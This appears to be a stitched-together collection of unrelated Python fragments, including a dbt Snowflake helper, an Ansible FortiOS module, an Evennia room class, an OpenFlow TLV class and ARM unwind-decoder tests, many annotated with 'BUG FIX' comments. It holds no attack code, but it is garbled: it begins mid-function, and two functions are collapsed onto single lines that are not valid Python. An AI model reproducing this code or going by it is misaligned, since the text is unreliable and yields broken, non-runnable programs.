    vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
    title_lower = item['title'].lower()
    if not (chp or vol) or 'preview' in title_lower:
        return None
    for tagname, name, tl_type in (
        ('PRC', 'PRC', 'translated'),
        ('Loiterous', 'Loiterous', 'oel'),
    ):
        if tagname in item['tags']:
            return buildReleaseMessageWithType(
                item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
    return False
def extract_flake8_rst_docstrings() -> Dict[str, str]:
    """Return a mapping of flake8-rst-docstrings codes ('RST<level><nn>') to messages."""
    from flake8_rst_docstrings import code_mappings_by_level

    return {
        'RST{}{:02d}'.format(level, number): message
        for level, mapping in code_mappings_by_level.items()
        for message, number in mapping.items()
    }
# Execute SQL against a Snowflake dbt adapter, optionally fetching the result
# as a pandas DataFrame.  Columns whose cursor type_code is 5 or 10 (variant /
# array-like — presumably JSON-encoded; confirm against the Snowflake connector
# type codes) are json-decoded per cell.  Returns (adapter response, DataFrame;
# empty frame when fetch=False).  Connection/cursor lifecycle is managed by the
# dbt connection manager — left byte-identical.
def _snowflake_execute_sql(adapter: BaseAdapter, sql: str, new_conn: bool, *, fetch: bool=True) -> Tuple[(AdapterResponse, pd.DataFrame)]: assert (adapter.type() == 'snowflake') import snowflake.connector as snowflake from dbt.adapters.snowflake import SnowflakeConnectionManager with _existing_or_new_connection(adapter, _connection_name('snowflake:execute_sql', sql), new_conn): connection_manager: SnowflakeConnectionManager = adapter.connections conn: snowflake.SnowflakeConnection = connection_manager.get_thread_connection().handle with connection_manager.exception_handler('EXECUTE SQL'): cur = conn.cursor() cur.execute(sql) res = connection_manager.get_response(cur) df = pd.DataFrame({}) if fetch: df: pd.DataFrame = cur.fetch_pandas_all() for desc in cur.description: if (desc.type_code in [5, 10]): import json df[desc.name] = df[desc.name].map((lambda v: json.loads(v))) return (res, df)
def calc_adaptation_matrices(w1: tuple[(float, float)], w2: tuple[(float, float)], m: Matrix) -> tuple[(Matrix, Matrix)]:
    """Compute the chromatic adaptation matrix from white point w1 to w2 (and its inverse).

    The white points (xy chromaticities) are projected through *m* into the
    cone response domain, a diagonal scaling between them is formed, and the
    result is mapped back.
    """
    cone_src = alg.matmul(m, util.xy_to_xyz(w1), dims=alg.D2_D1)
    cone_dst = alg.matmul(m, util.xy_to_xyz(w2), dims=alg.D2_D1)
    scaling = alg.diag(alg.divide(cone_dst, cone_src, dims=alg.D1))
    adapt = alg.matmul(alg.solve(m, scaling), m, dims=alg.D2)
    return adapt, alg.inv(adapt)
def _test_data(db):
    # Fixture helper: seed one AwardSearch row and one ParentAward row
    # ('CONT_IDV_2') with fixed direct/rollup counts and money amounts via
    # model-bakery.  The `db` argument is the pytest-django database fixture.
    baker.make('search.AwardSearch', award_id=1)
    baker.make('awards.ParentAward', award_id=1, generated_unique_award_id='CONT_IDV_2', direct_idv_count=3, direct_contract_count=4, direct_total_obligation='5.01', direct_base_and_all_options_value='6.02', direct_base_exercised_options_val='7.03', rollup_idv_count=8, rollup_contract_count=9, rollup_total_obligation='10.04', rollup_base_and_all_options_value='11.05', rollup_base_exercised_options_val='12.06')
def get_deck_mostly_linked_to_note(siac_nid: int) -> Optional[str]:
    """Return the name of the deck holding most of the cards linked to a note.

    Looks at the 50 most recent page links for *siac_nid*, counts the decks of
    the corresponding Anki cards, and returns the most frequent deck's name
    (None when the note has no links or the deck cannot be resolved).
    """
    conn = _get_connection()
    try:
        # BUG FIX: parameterized query instead of interpolating siac_nid into
        # the SQL string; also guarantees the connection is closed on error.
        nids = conn.execute(
            'select nid from notes_pdf_page where siac_nid = ? order by rowid desc limit 50',
            (siac_nid,),
        ).fetchall()
    finally:
        conn.close()
    if not nids:
        return None
    nid_list = ','.join(str(row[0]) for row in nids)
    res = mw.col.db.first(f'select did, count(did) as cnt from (select did from cards where nid in ({nid_list})) group by did order by cnt desc limit 1')
    if res is None:
        return None
    did = res[0]
    try:
        return mw.col.decks.get(did)['name']
    except Exception:
        # decks.get may yield None / a dict without 'name' for a deleted deck;
        # narrowed from the original bare `except:`.
        return None
class LruLockWrapper():
    """Serialize all item access to an LRU cache behind a single lock."""

    def __init__(self, lru: LRU) -> None:
        self.lru = lru
        self.lock = threading.Lock()

    def __getitem__(self, *args: Any, **kwargs: Any) -> Any:
        # Each dunder simply forwards to the wrapped LRU under the lock.
        with self.lock:
            return self.lru.__getitem__(*args, **kwargs)

    def __setitem__(self, *args: Any, **kwargs: Any) -> Any:
        with self.lock:
            return self.lru.__setitem__(*args, **kwargs)

    def __contains__(self, *args: Any, **kwargs: Any) -> Any:
        with self.lock:
            return self.lru.__contains__(*args, **kwargs)

    def __delitem__(self, *args: Any, **kwargs: Any) -> Any:
        with self.lock:
            return self.lru.__delitem__(*args, **kwargs)
# Ansible module entry point for the fortios hardware_npu_np6_dce resource:
# build the argument spec from the versioned schema, open the httpapi
# connection (propagating access_token / enable_log), run the schema version
# check, apply the change via fortios_hardware_npu_np6, and exit/fail with the
# combined result.  NOTE(review): generated-style boilerplate with interleaved
# error/version handling — left byte-identical.
def main(): module_spec = schema_to_module_spec(versioned_schema) mkeyname = None fields = {'access_token': {'required': False, 'type': 'str', 'no_log': True}, 'enable_log': {'required': False, 'type': 'bool', 'default': False}, 'vdom': {'required': False, 'type': 'str', 'default': 'root'}, 'member_path': {'required': False, 'type': 'str'}, 'member_state': {'type': 'str', 'required': False, 'choices': ['present', 'absent']}, 'hardware_npu_np6_dce': {'required': False, 'type': 'dict', 'default': None, 'options': {}}} for attribute_name in module_spec['options']: fields['hardware_npu_np6_dce']['options'][attribute_name] = module_spec['options'][attribute_name] if (mkeyname and (mkeyname == attribute_name)): fields['hardware_npu_np6_dce']['options'][attribute_name]['required'] = True module = AnsibleModule(argument_spec=fields, supports_check_mode=False) check_legacy_fortiosapi(module) is_error = False has_changed = False result = None diff = None versions_check_result = None if module._socket_path: connection = Connection(module._socket_path) if ('access_token' in module.params): connection.set_option('access_token', module.params['access_token']) if ('enable_log' in module.params): connection.set_option('enable_log', module.params['enable_log']) else: connection.set_option('enable_log', False) fos = FortiOSHandler(connection, module, mkeyname) versions_check_result = check_schema_versioning(fos, versioned_schema, 'hardware_npu_np6_dce') (is_error, has_changed, result, diff) = fortios_hardware_npu_np6(module.params, fos) else: module.fail_json(**FAIL_SOCKET_MSG) if (versions_check_result and (versions_check_result['matched'] is False)): module.warn('Ansible has detected version mismatch between FortOS system and your playbook, see more details by specifying option -vvv') if (not is_error): if (versions_check_result and (versions_check_result['matched'] is False)): module.exit_json(changed=has_changed, version_check_warning=versions_check_result, meta=result, 
diff=diff) else: module.exit_json(changed=has_changed, meta=result, diff=diff) elif (versions_check_result and (versions_check_result['matched'] is False)): module.fail_json(msg='Error in repo', version_check_warning=versions_check_result, meta=result) else: module.fail_json(msg='Error in repo', meta=result)
class OptionSeriesTimelineLabelStyle(Options):
    """Label style options for a timeline series."""

    # BUG FIX: each getter/setter pair shared a name with no decorators, so the
    # later plain `def` silently replaced the earlier one and the getters were
    # unreachable.  Restored the @property / @<name>.setter pattern implied by
    # the _config_get/_config calls.
    @property
    def fontSize(self):
        """Font size of the label (CSS size, default '0.8em')."""
        return self._config_get('0.8em')

    @fontSize.setter
    def fontSize(self, num: float):
        self._config(num, js_type=False)

    @property
    def fontWeight(self):
        """Font weight of the label (default 'bold')."""
        return self._config_get('bold')

    @fontWeight.setter
    def fontWeight(self, text: str):
        self._config(text, js_type=False)
def test_generate_fiscal_year_and_quarter():
    """Dates map to US federal fiscal year-quarter strings (FY starts Oct 1)."""
    expectations = {
        date(2000, 9, 30): '2000-Q4',
        date(2001, 10, 1): '2002-Q1',
        date(2020, 3, 2): '2020-Q2',
        date(2017, 5, 30): '2017-Q3',
        date(2019, 10, 30): '2020-Q1',
    }
    for given_date, expected in expectations.items():
        assert fyh.generate_fiscal_year_and_quarter(given_date) == expected
class Label(Base, ReprMixIn):
    """Key/value label attached to a version row.

    Composite primary key (version_id, name): a version may carry many
    labels, one value per label name. Rows are removed automatically when
    the owning version is deleted (ON DELETE CASCADE).
    """
    __tablename__ = 'labels'
    # Attribute ordering used by ReprMixIn when rendering __repr__.
    REPR_SQL_ATTR_SORT_FIRST = ['version_id', 'name', 'value']
    # FK to versions.id; part of the composite primary key.
    version_id = sqlalchemy.Column(sqlalchemy.Integer, sqlalchemy.ForeignKey('versions.id', ondelete='CASCADE'), primary_key=True, nullable=False)
    # Label name; indexed for lookups by name.
    name = sqlalchemy.Column(sqlalchemy.String(255), nullable=False, index=True, primary_key=True)
    # Label value; indexed so versions can be filtered by value.
    value = sqlalchemy.Column(sqlalchemy.String(255), nullable=False, index=True)
class RawOutputDataConfig(FlyteIdlEntity):
    """Wrapper around the flyteidl ``RawOutputDataConfig`` message.

    BUGFIX: ``output_location_prefix`` is read as an attribute by
    ``to_flyte_idl`` but was defined as a plain method (so a bound method
    object would have been handed to protobuf); restored ``@property``.
    ``from_flyte_idl`` takes ``cls`` and constructs an instance, so it is a
    ``@classmethod``.
    """

    def __init__(self, output_location_prefix):
        # Prefix (e.g. an s3:// path) under which raw task outputs are stored.
        self._output_location_prefix = output_location_prefix

    @property
    def output_location_prefix(self):
        """The configured raw-output location prefix."""
        return self._output_location_prefix

    def to_flyte_idl(self):
        """Serialize to the protobuf representation."""
        return _common_pb2.RawOutputDataConfig(output_location_prefix=self.output_location_prefix)

    @classmethod
    def from_flyte_idl(cls, pb2):
        """Build an instance from its protobuf representation."""
        return cls(output_location_prefix=pb2.output_location_prefix)
class DeleteReport(MethodView):
    """Moderator-only view that deletes reports, singly or in bulk."""

    # Access control: moderators and above; others are flashed and redirected.
    decorators = [allows.requires(IsAtleastModerator, on_fail=FlashAndRedirect(message=_('You are not allowed to view reports.'), level='danger', endpoint='management.overview'))]

    def post(self, report_id=None):
        """Delete reports.

        JSON body with an ``ids`` list triggers bulk deletion and a JSON
        response; otherwise ``report_id`` identifies a single report and the
        client is redirected back to the reports page.
        """
        json = request.get_json(silent=True)
        if (json is not None):
            ids = json.get('ids')
            if (not ids):
                return jsonify(message='No ids provided.', category='error', status=404)
            data = []
            for report in Report.query.filter(Report.id.in_(ids)).all():
                # Only count reports whose delete() reports success.
                if report.delete():
                    data.append({'id': report.id, 'type': 'delete', 'reverse': False, 'reverse_name': None, 'reverse_url': None})
            return jsonify(message='{} reports deleted.'.format(len(data)), category='success', data=data, status=200)
        # Non-JSON request: delete a single report or 404.
        report = Report.query.filter_by(id=report_id).first_or_404()
        report.delete()
        flash(_('Report deleted.'), 'success')
        return redirect_or_next(url_for('management.reports'))
class Display(lg.Node):
    """Labgraph node that renders PsychoPy stimuli and publishes their keys.

    BUGFIX: the ``(KEYS_TOPIC)`` / ``(DISPLAY_TOPIC)`` lines were bare
    expression statements — stripped decorators. Restored
    ``@lg.publisher`` / ``@lg.subscriber`` / ``@lg.main`` so the node
    actually wires its topics and main-thread loop.
    """
    KEYS_TOPIC = lg.Topic(KeysMessage)
    DISPLAY_TOPIC = lg.Topic(DisplayMessage)

    def setup(self) -> None:
        # Stims are created lazily on the display thread (needs a window).
        self._stims = None
        self._shutdown = False

    def cleanup(self) -> None:
        self._shutdown = True

    def _setup_stims(self, window: visual.Window) -> None:
        """Create the stimuli dict for *window* and store it on the node.

        (Annotation fixed: this assigns to ``self._stims`` and returns None.)
        """
        files = importlib_resources.files('psychopy_example')
        null = ((files / 'images') / 'null.png')
        with importlib_resources.as_file(null) as null_path:
            image_stim = visual.ImageStim(window, image=str(null_path), pos=(0, 0))
        text_stim = visual.TextStim(window, text='Example Text', pos=(0, 0))
        self._stims = {'image': image_stim, 'text': text_stim}

    @lg.publisher(KEYS_TOPIC)
    async def send_keys(self) -> lg.AsyncPublisher:
        """Publish the available stimulus keys once the stims exist."""
        while (self._stims is None):
            (await asyncio.sleep(0.1))
        (yield (self.KEYS_TOPIC, KeysMessage(list(self._stims.keys()))))

    @lg.subscriber(DISPLAY_TOPIC)
    def update_stim(self, message: DisplayMessage) -> None:
        """Show only the stimulus named by the incoming message."""
        for stim in self._stims.values():
            stim.autoDraw = False
        self._stims[message.key].autoDraw = True

    @lg.main
    def display(self) -> None:
        """Main-thread render loop: open the window and flip until shutdown."""
        # NOTE(review): creating the Monitor presumably registers monitor
        # configuration as a side effect — confirm before removing.
        monitor = monitors.Monitor('PsychopyMonitor')
        window = visual.Window(fullscr=True)
        self._setup_stims(window)
        while (not self._shutdown):
            window.flip()
        window.close()
def guidedUpdate(tdb, cmdenv):
    """Run the interactive (GUI) price-update flow for the start station.

    Renders the update GUI into a temporary prices file, imports the result
    into the database and saves a copy of the changes. On failure the
    temporary file is preserved as a recovery copy.
    """
    dbFilename = tdb.dbFilename
    stationID = cmdenv.startStation.ID
    tmpPath = getTemporaryPath(cmdenv)
    # Report how stale the station's current price data is (days).
    cur = tdb.query("\n SELECT JULIANDAY('now') - JULIANDAY(MIN(modified)),\n JULIANDAY('now') - JULIANDAY(MAX(modified))\n FROM StationItem\n WHERE station_id = ?\n ", [stationID])
    (oldest, newest) = cur.fetchone()
    if (oldest and newest):
        cmdenv.NOTE('Current data {:.2f}-{:.2f} days old.', oldest, newest)
    # Imported lazily so the GUI toolkit is only loaded when actually needed.
    from .update_gui import render
    try:
        render(tdb, cmdenv, tmpPath)
        cmdenv.DEBUG0('Got results, importing')
        cache.importDataFromFile(tdb, cmdenv, tmpPath)
        saveCopyOfChanges(cmdenv, dbFilename, stationID)
        # Import succeeded: the temp file is no longer needed.
        tmpPath.unlink()
        tmpPath = None
    except Exception as e:
        print('ERROR:', e)
        print()
        print('*** YOUR UPDATES WILL BE SAVED AS {} ***'.format('prices.last'))
    if tmpPath:
        # Import failed (tmpPath was not cleared): keep the user's edits.
        saveTemporaryFile(tmpPath)
        # Developer escape hatch: re-raise the captured exception on demand.
        if ('EXCEPTIONS' in os.environ):
            raise e
class ExtendedRoom(DefaultRoom):
    """Room with state-, season- and time-of-day-aware descriptions,
    look-at details and optional repeating room messages.

    Fixes applied in this revision:
    - broadcast task referenced a nonexistent method name;
    - ``get_stateful_desc`` looked up a literal ``'{roomstate}_desc'``
      (missing f-string prefix);
    - ``clear_room_state`` hardcoded the tag category;
    - first call of ``replace_legacy_time_of_day_markup`` used the wrong
      time slot because the loop variable clobbered ``time_of_day``;
    - ``room_states`` and ``all_desc`` are read as attributes elsewhere in
      this class, so they are properties.
    """

    # Shown when no description at all has been set.
    fallback_desc = 'You see nothing special.'
    # Tag category under which room states are stored.
    room_state_tag_category = 'room_state'

    months_per_year = 12
    hours_per_day = 24

    # Seasons as (start, end) fractions of the game year; winter wraps.
    seasons_per_year = {'spring': ((3 / months_per_year), (6 / months_per_year)), 'summer': ((6 / months_per_year), (9 / months_per_year)), 'autumn': ((9 / months_per_year), (12 / months_per_year)), 'winter': ((12 / months_per_year), (3 / months_per_year))}

    # Optional per-season descriptions (stored as Attributes on demand).
    desc_spring = AttributeProperty('', autocreate=False)
    desc_summer = AttributeProperty('', autocreate=False)
    desc_autumn = AttributeProperty('', autocreate=False)
    desc_winter = AttributeProperty('', autocreate=False)

    # Times of day as (start, end) fractions of the game day; evening wraps.
    times_of_day = {'night': (0, (6 / hours_per_day)), 'morning': ((6 / hours_per_day), (12 / hours_per_day)), 'afternoon': ((12 / hours_per_day), (18 / hours_per_day)), 'evening': ((18 / hours_per_day), 0)}

    # Base description and look-at details.
    desc = AttributeProperty('', autocreate=False)
    details = AttributeProperty(dict, autocreate=False)

    # How often (seconds) to broadcast a random room message; 0 disables.
    room_message_rate = 0
    room_messages = AttributeProperty(list, autocreate=False)

    def _get_funcparser(self, looker):
        # Parser resolving $state(...) inline functions in descriptions.
        return FuncParser({'state': func_state}, looker=looker, room=self)

    def _start_broadcast_repeat_task(self):
        # Start the periodic broadcast only when configured and not running.
        if (self.room_message_rate and self.room_messages and (not self.ndb.broadcast_repeat_task)):
            # BUGFIX: previously called the nonexistent
            # `repeat_broadcast_msg_to_room`.
            self.ndb.broadcast_repeat_task = repeat(self.room_message_rate, self.repeat_broadcast_message_to_room, persistent=False)

    def at_init(self):
        self._start_broadcast_repeat_task()

    def start_repeat_broadcast_messages(self):
        """(Re)start the repeating room-message broadcast task."""
        self._start_broadcast_repeat_task()

    def repeat_broadcast_message_to_room(self):
        """Send one random room message to everyone in the room."""
        self.msg_contents(random.choice(self.room_messages))

    # Backwards-compatible alias for the short name used by older callers.
    repeat_broadcast_msg_to_room = repeat_broadcast_message_to_room

    def get_time_of_day(self):
        """Return the current time-of-day key ('night', 'morning', ...)."""
        timestamp = gametime.gametime(absolute=True)
        datestamp = datetime.datetime.fromtimestamp(timestamp)
        timeslot = (float(datestamp.hour) / self.hours_per_day)
        for (time_of_day, (start, end)) in self.times_of_day.items():
            if ((start < end) and (start <= timeslot < end)):
                return time_of_day
        # Falls through for the wrapping slot (start > end), e.g. evening.
        return time_of_day

    def get_season(self):
        """Return the current season key ('spring', 'summer', ...)."""
        timestamp = gametime.gametime(absolute=True)
        datestamp = datetime.datetime.fromtimestamp(timestamp)
        timeslot = (float(datestamp.month) / self.months_per_year)
        for (season_of_year, (start, end)) in self.seasons_per_year.items():
            if ((start < end) and (start <= timeslot < end)):
                return season_of_year
        # Falls through for the wrapping season (winter).
        return season_of_year

    @property
    def room_states(self):
        """Sorted list of currently active room-state tags."""
        return list(sorted(self.tags.get(category=self.room_state_tag_category, return_list=True)))

    def add_room_state(self, *room_states):
        """Activate one or more room states."""
        self.tags.batch_add(*((state, self.room_state_tag_category) for state in room_states))

    def remove_room_state(self, *room_states):
        """Deactivate one or more room states."""
        for room_state in room_states:
            self.tags.remove(room_state, category=self.room_state_tag_category)

    def clear_room_state(self):
        """Deactivate all room states."""
        # Consistency fix: use the class-level category, not a literal.
        self.tags.clear(category=self.room_state_tag_category)

    def add_desc(self, desc, room_state=None):
        """Set the base description, or the one for a given room state."""
        if (room_state is None):
            self.attributes.add('desc', desc)
        else:
            self.attributes.add(f'desc_{room_state}', desc)

    def remove_desc(self, room_state):
        """Remove the description stored for a given room state."""
        self.attributes.remove(f'desc_{room_state}')

    @property
    def all_desc(self):
        """Mapping {room_state_or_None: description} of all stored descs."""
        return {**{None: (self.db.desc or '')}, **{attr.key[5:]: attr.value for attr in self.db_attributes.filter(db_key__startswith='desc_').order_by('db_key')}}

    def get_stateful_desc(self):
        """Pick the description matching active states/season, with fallbacks."""
        room_states = self.room_states
        seasons = self.seasons_per_year.keys()
        seasonal_room_states = []
        # Fetch all candidate descriptions in one query; supports both the
        # 'desc_<state>' and legacy '<state>_desc' attribute-key styles.
        descriptions = dict(self.db_attributes.filter((Q(db_key__startswith='desc_') | Q(db_key__endswith='_desc'))).values_list('db_key', 'db_value'))
        for roomstate in sorted(room_states):
            if (roomstate not in seasons):
                # BUGFIX: second lookup was a literal '{roomstate}_desc'.
                if (desc := (descriptions.get(f'desc_{roomstate}') or descriptions.get(f'{roomstate}_desc'))):
                    return desc
            else:
                seasonal_room_states.append(roomstate)
        if (not seasons):
            return self.attributes.get('desc')
        # Explicitly-set seasonal states take precedence over the calendar.
        for seasonal_roomstate in seasonal_room_states:
            if (desc := descriptions.get(f'desc_{seasonal_roomstate}')):
                return desc
        season = self.get_season()
        if (desc := (descriptions.get(f'desc_{season}') or descriptions.get(f'{season}_desc'))):
            return desc
        return self.attributes.get('desc', self.fallback_desc)

    def replace_legacy_time_of_day_markup(self, desc):
        """Resolve legacy ``<morning>...</morning>``-style markup in *desc*.

        The tags for the current time of day are unwrapped (content kept);
        all other time-of-day tags are stripped together with their content.
        """
        desc = (desc or '')
        time_of_day = self.get_time_of_day()
        if (not hasattr(self, 'legacy_timeofday_regex_map')):
            # Build, once, a map {tod: [regex-for-tod, other-regexes...]}
            # by rotating the deque so each key's own regex comes first.
            timeslots = deque()
            # BUGFIX: loop variable previously shadowed `time_of_day`,
            # so the first call used the wrong slot.
            for tod in self.times_of_day:
                timeslots.append((tod, re.compile(f'<{tod}>(.*?)</{tod}>', re.IGNORECASE)))
            self.legacy_timeofday_regex_map = {}
            for _ in range(len(timeslots)):
                self.legacy_timeofday_regex_map[timeslots[0][0]] = [tup[1] for tup in timeslots]
                timeslots.rotate((- 1))
        regextuple = self.legacy_timeofday_regex_map[time_of_day]
        # Keep the current slot's content, drop the other three entirely.
        desc = regextuple[0].sub('\\1', desc)
        desc = regextuple[1].sub('', desc)
        desc = regextuple[2].sub('', desc)
        return regextuple[3].sub('', desc)

    def get_display_desc(self, looker, **kwargs):
        """Return the fully resolved description as shown to *looker*."""
        desc = self.get_stateful_desc()
        desc = self.replace_legacy_time_of_day_markup(desc)
        desc = self._get_funcparser(looker).parse(desc, **kwargs)
        return desc

    def add_detail(self, key, description):
        """Add (or overwrite) a look-at detail under *key*."""
        if (not self.details):
            self.details = {}
        self.details[key.lower()] = description

    set_detail = add_detail

    def remove_detail(self, key, *args):
        """Remove the detail stored under *key* (no-op if absent)."""
        self.details.pop(key.lower(), None)

    del_detail = remove_detail

    def get_detail(self, key, looker=None):
        """Return the detail for *key*, allowing unique prefix matches."""
        key = key.lower()
        detail_keys = tuple(self.details.keys())
        detail = None
        if (key in detail_keys):
            detail = self.details[key]
        else:
            # Prefix match: prefer the candidate closest in length to key.
            lkey = len(key)
            startswith_matches = sorted(((detail_key, abs((lkey - len(detail_key)))) for detail_key in detail_keys if detail_key.startswith(key)), key=(lambda tup: tup[1]))
            if startswith_matches:
                detail = self.details[startswith_matches[0][0]]
        if detail:
            detail = self._get_funcparser(looker).parse(detail)
            return detail
        return detail

    return_detail = get_detail
@attr.s(auto_attribs=True)
class InvoiceItem():
    """One line item of an invoice (openapi-generated model).

    BUGFIX: the class decorator had been reduced to a bare
    ``(auto_attribs=True)`` (a syntax error); restored
    ``@attr.s(auto_attribs=True)``, which the ``attr.ib`` field requires.
    ``from_dict`` and ``additional_keys`` regained their ``@classmethod`` /
    ``@property`` decorators.
    """
    name: str
    amount: int
    quantity: int
    machine_type: str
    run_type: str
    # Catch-all for fields not declared in the schema.
    additional_properties: Dict[str, Any] = attr.ib(init=False, factory=dict)

    def to_dict(self) -> Dict[str, Any]:
        """Serialize to a plain dict, declared fields overriding extras."""
        name = self.name
        amount = self.amount
        quantity = self.quantity
        machine_type = self.machine_type
        run_type = self.run_type
        field_dict: Dict[str, Any] = {}
        field_dict.update(self.additional_properties)
        field_dict.update({'name': name, 'amount': amount, 'quantity': quantity, 'machine_type': machine_type, 'run_type': run_type})
        return field_dict

    @classmethod
    def from_dict(cls: Type[T], src_dict: Dict[str, Any]) -> T:
        """Build an instance from a dict; leftovers become extras."""
        d = src_dict.copy()
        name = d.pop('name')
        amount = d.pop('amount')
        quantity = d.pop('quantity')
        machine_type = d.pop('machine_type')
        run_type = d.pop('run_type')
        invoice_item = cls(name=name, amount=amount, quantity=quantity, machine_type=machine_type, run_type=run_type)
        invoice_item.additional_properties = d
        return invoice_item

    @property
    def additional_keys(self) -> List[str]:
        """Names of the undeclared (extra) properties."""
        return list(self.additional_properties.keys())

    def __getitem__(self, key: str) -> Any:
        return self.additional_properties[key]

    def __setitem__(self, key: str, value: Any) -> None:
        self.additional_properties[key] = value

    def __delitem__(self, key: str) -> None:
        del self.additional_properties[key]

    def __contains__(self, key: str) -> bool:
        return (key in self.additional_properties)
def to_dict(package, with_latest_build=False, with_latest_succeeded_build=False):
    """Serialize a package (and optionally its latest builds) to a dict."""
    source_dict = package.source_json_dict
    # Rename the legacy key to its current name.
    if 'srpm_build_method' in source_dict:
        source_dict['source_build_method'] = source_dict.pop('srpm_build_method')

    latest = None
    if with_latest_build:
        # Prefer a pre-fetched latest_build attribute; fall back to a query.
        build = getattr(package, 'latest_build', None) or package.last_build()
        if build:
            latest = build_to_dict(build)

    latest_succeeded = None
    if with_latest_succeeded_build:
        build = package.last_build(successful=True)
        if build:
            latest_succeeded = build_to_dict(build)

    return {
        'id': package.id,
        'name': package.name,
        'projectname': package.copr.name,
        'ownername': package.copr.owner_name,
        'source_type': package.source_type_text,
        'source_dict': source_dict,
        'auto_rebuild': package.webhook_rebuild,
        'builds': {'latest': latest, 'latest_succeeded': latest_succeeded},
    }
class parent_port(bsn_tlv):
    """BSN ``parent_port`` TLV (wire type 109), carrying a port number.

    BUGFIX: ``unpack`` takes no ``self`` and constructs a fresh object — it
    is a ``@staticmethod`` (the decorator had been stripped).
    """
    type = 109

    def __init__(self, value=None):
        if value is not None:
            self.value = value
        else:
            self.value = 0

    def pack(self):
        """Serialize as type/length header plus the packed port number."""
        packed = []
        packed.append(struct.pack('!H', self.type))
        # Length placeholder, patched once the total size is known.
        packed.append(struct.pack('!H', 0))
        packed.append(util.pack_port_no(self.value))
        length = sum([len(x) for x in packed])
        packed[1] = struct.pack('!H', length)
        return ''.join(packed)

    @staticmethod
    def unpack(reader):
        """Deserialize a parent_port TLV from *reader*."""
        obj = parent_port()
        _type = reader.read('!H')[0]
        assert (_type == 109)
        _length = reader.read('!H')[0]
        # Constrain reading to this TLV's payload (length minus the
        # 4-byte header already consumed).
        orig_reader = reader
        reader = orig_reader.slice(_length, 4)
        obj.value = util.unpack_port_no(reader)
        return obj

    def __eq__(self, other):
        if (type(self) != type(other)):
            return False
        if (self.value != other.value):
            return False
        return True

    def pretty_print(self, q):
        q.text('parent_port {')
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text('value = ')
                q.text(util.pretty_port(self.value))
            q.breakable()
        q.text('}')
class ADSEntity():
    """Wrapper around an ADS1015/ADS1115 I2C analog-to-digital converter.

    Caches the last reading per channel and uses a ``busy`` flag to
    serialize access to the chip. Fixed: the bare ``except:`` clauses (which
    also swallowed KeyboardInterrupt/SystemExit) now catch ``Exception``.
    """

    def __init__(self, i2cAddress, busnum=1, atype=0):
        self.busy = False
        self.initialized = False
        self.i2cAddress = int(i2cAddress)
        self.busnum = int(busnum)
        # Last value read for each of the four channels.
        self.values = [0, 0, 0, 0]
        try:
            # atype 0 or 10 selects the 12-bit ADS1015, anything else the
            # 16-bit ADS1115.
            if (atype == 10) or (atype == 0):
                self.adc = ADS.ADS1015(address=self.i2cAddress, busnum=self.busnum)
            else:
                self.adc = ADS.ADS1115(address=self.i2cAddress, busnum=self.busnum)
            self.initialized = True
        except Exception:
            self.initialized = False

    def ADread(self, channel, again=None):
        """Read *channel* (with optional gain); fall back to the cached value.

        If the chip is busy, wait briefly; if still busy, return the last
        cached reading. On read failure the busy flag is cleared and 0 is
        returned.
        """
        val = self.values[channel]
        try:
            if self.busy:
                time.sleep(0.1)
            if not self.busy:
                self.busy = True
                val = self.adc.read_adc(channel, gain=again)
                self.busy = False
                self.values[channel] = val
        except Exception:
            self.busy = False
            val = 0
        return val
class TestEHABIDecoder(unittest.TestCase):
    """Tests for the ARM EHABI unwind-bytecode mnemonic decoder."""

    def testLLVM(self):
        """Decode byte sequences and compare against the expected mnemonics.

        The vectors cover register pops, vsp adjustments, VFP/iWMMX pops,
        finish/refuse opcodes and the reserved/spare encodings.
        """
        # Basic sequence: integer pops, large vsp increment, finish padding.
        mnemonic_array = EHABIBytecodeDecoder([177, 15, 167, 63, 176, 176]).mnemonic_array
        self.assertEqual(mnemonic_array[0].mnemonic, 'pop {r0, r1, r2, r3}')
        self.assertEqual(mnemonic_array[1].mnemonic, 'pop {r4, r5, r6, r7, r8, r9, r10, fp}')
        self.assertEqual(mnemonic_array[2].mnemonic, 'vsp = vsp + 256')
        self.assertEqual(mnemonic_array[3].mnemonic, 'finish')
        self.assertEqual(mnemonic_array[4].mnemonic, 'finish')
        # VFP double-register pop.
        mnemonic_array = EHABIBytecodeDecoder([201, 132, 176]).mnemonic_array
        self.assertEqual(mnemonic_array[0].mnemonic, 'pop {d8, d9, d10, d11, d12}')
        self.assertEqual(mnemonic_array[1].mnemonic, 'finish')
        # Mixed sequence exercising most multi-register/multi-byte opcodes.
        mnemonic_array = EHABIBytecodeDecoder([215, 201, 2, 200, 2, 199, 3, 198, 2, 194, 186, 179, 18, 178, 128, 4, 177, 1, 176, 169, 161, 145, 132, 192, 128, 192, 128, 1, 129, 0, 128, 0, 66, 2]).mnemonic_array
        self.assertEqual(mnemonic_array[0].mnemonic, 'pop {d8, d9, d10, d11, d12, d13, d14, d15}')
        self.assertEqual(mnemonic_array[1].mnemonic, 'pop {d0, d1, d2}')
        self.assertEqual(mnemonic_array[2].mnemonic, 'pop {d16, d17, d18}')
        self.assertEqual(mnemonic_array[3].mnemonic, 'pop {wCGR0, wCGR1}')
        self.assertEqual(mnemonic_array[4].mnemonic, 'pop {wR0, wR1, wR2}')
        self.assertEqual(mnemonic_array[5].mnemonic, 'pop {wR10, wR11, wR12}')
        self.assertEqual(mnemonic_array[6].mnemonic, 'pop {d8, d9, d10}')
        self.assertEqual(mnemonic_array[7].mnemonic, 'pop {d1, d2, d3}')
        self.assertEqual(mnemonic_array[8].mnemonic, 'vsp = vsp + 2564')
        self.assertEqual(mnemonic_array[9].mnemonic, 'pop {r0}')
        self.assertEqual(mnemonic_array[10].mnemonic, 'finish')
        self.assertEqual(mnemonic_array[11].mnemonic, 'pop {r4, r5, lr}')
        self.assertEqual(mnemonic_array[12].mnemonic, 'pop {r4, r5}')
        self.assertEqual(mnemonic_array[13].mnemonic, 'vsp = r1')
        self.assertEqual(mnemonic_array[14].mnemonic, 'pop {r10, fp, lr}')
        self.assertEqual(mnemonic_array[15].mnemonic, 'pop {r10, fp}')
        self.assertEqual(mnemonic_array[16].mnemonic, 'pop {r4}')
        self.assertEqual(mnemonic_array[17].mnemonic, 'pop {ip}')
        self.assertEqual(mnemonic_array[18].mnemonic, 'refuse to unwind')
        self.assertEqual(mnemonic_array[19].mnemonic, 'vsp = vsp - 12')
        self.assertEqual(mnemonic_array[20].mnemonic, 'vsp = vsp + 12')
